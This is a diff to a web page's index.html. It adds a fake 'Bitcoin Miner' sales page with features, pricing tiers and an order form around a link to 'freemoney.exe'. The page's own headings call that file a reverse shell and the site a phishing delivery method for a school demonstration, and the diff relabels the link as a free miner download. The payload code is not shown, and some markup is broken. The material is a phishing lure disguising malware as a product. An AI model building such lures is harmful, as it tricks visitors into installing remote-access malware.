--- a/index.html
+++ b/index.html
@@ -17,16 +17,97 @@ a:visited {
 </style>
 </head> 
     <body>
+        <header> #start
+            <h1>Bitcoin Miner</h1>
+            <nav>
+                <ul>
+                    <li><a href="#features">Features</a></li>
+                    <li><a href="#pricing">Pricing</a></li>
+                    <li><a href="#contact">Contact Us</a></li>
+                </ul>
+            </nav>
+        </header>
+        <main>
+            <section id="hero">
+                <h2>Get the Best Bitcoin Miner Today</h2>
+                <p>Our bitcoin miner is the most efficient and profitable on the market. With our cutting-edge technology, you'll be mining bitcoin faster and earning more profits in no time.</p>
+                <a href="#pricing" class="button">Get Started Now</a>
+            </section>
+            <section id="features">
+                <h2>Features of Our Bitcoin Miner</h2>
+                <ul>
+                    <li>Efficient and fast mining technology</li>
+                    <li>Low power consumption</li>
+                    <li>Easy to set up and use</li>
+                    <li>24/7 customer support</li>
+                </ul>
+            </section>
+            <section id="pricing">
+                <h2>Pricing</h2>
+                <p>Our bitcoin miner is available at a competitive price that won't break the bank. Choose the package that's right for you:</p>
+                <table>
+                    <thead>
+                        <tr>
+                            <th>Package</th>
+                            <th>Price</th>
+                        </tr>
+                    </thead>
+                    <tbody>
+                        <tr>
+                            <td>Basic</td>
+                            <td>$999</td>
+                        </tr>
+                        <tr>
+                            <td>Standard</td>
+                            <td>$1,999</td>
+                        </tr>
+                        <tr>
+                            <td>Premium</td>
+                            <td>$2,999</td>
+                        </tr>
+                    </tbody>
+                </table>
+                <a href="#contact" class="button">Order Now</a>
+            </section>
+            <section id="contact">
+                <h2>Contact Us</h2>
+                <p>Have questions or want to place an order? Contact us today:</p>
+                <form>
+                    <label for="name">Name:</label>
+                    <input type="text" id="name" name="name" required>
+                    <label for="email">Email:</label>
+                    <input type="email" id="email" name="email" required>
+                    <label for="message">Message:</label>
+                    <textarea id="message" name="message" required></textarea>
+                    <button type="submit" class="button">Submit</button>
+                </form>
+            </section>
+        </main>
+        <footer>
+            <p>&copy; 2023 Bitcoin Miner. All rights reserved.</p>
+        </footer>
+    #end
         <h1 style="font-size: 3rem; color:white">This site is being used for a independant school project</h1>
-        <h2 style="color:white">The download file is a reverse shell, this website is a phishing delivery method.</h2>
+        <h2 style="color:white">The download file is a reverse shell, this website is a phishing delivery method for demonstration purposes.</h2>
         <h3 style="color:white">Please don't download the file.</h3>
 
         <a href="freemoney.exe" download>
-            <img src="freemoney.exe" alt="freemoney">
+            <img src="freemoney.exe" alt="Click this link to download the free bitcoin miner">
         </a>
 
     </body>
     <footer>
+        <p<</p>
+        <p<</p>
+        <p<</p>
+        <p<</p>
+        <p<</p>
+        <p<</p>
+        <p<</p>
+        <p<</p>
+        <p<</p>
+        <p<</p>
+        <p<</p>
         <p style="color:white">Made by Sam Cairns</p>
         
     </footer>
